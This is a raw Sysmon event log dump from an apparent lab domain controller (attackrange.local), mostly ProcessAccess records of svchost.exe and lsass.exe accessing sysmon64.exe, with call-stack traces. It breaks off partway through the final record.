16341600x80000000000000001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local2021-01-18 13:33:09.777c:\Program Files\ansible\AttackRangeSysmon.xmlSHA256=053B78A3D994D6604525A750D088177DAE3B5F72779F202BD327F521DD97B212 10341000x800000000000000035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.168{59A5CD1D-8CA9-6005-1300-00000000A201}12682032C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.137{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.137{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.137{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.137{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.137{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.137{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.137{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.137{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.137{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.137{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.137{59A5CD1D-8CA6-6005-0B00-00000000A201}876600C:\Windows\system32\lsass.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.121{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.121{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.121{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000020Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.121{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.121{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.121{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.121{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.121{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.121{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.121{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.121{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:11.121{59A5CD1D-8CA8-6005-0C00-00000000A201}480856C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 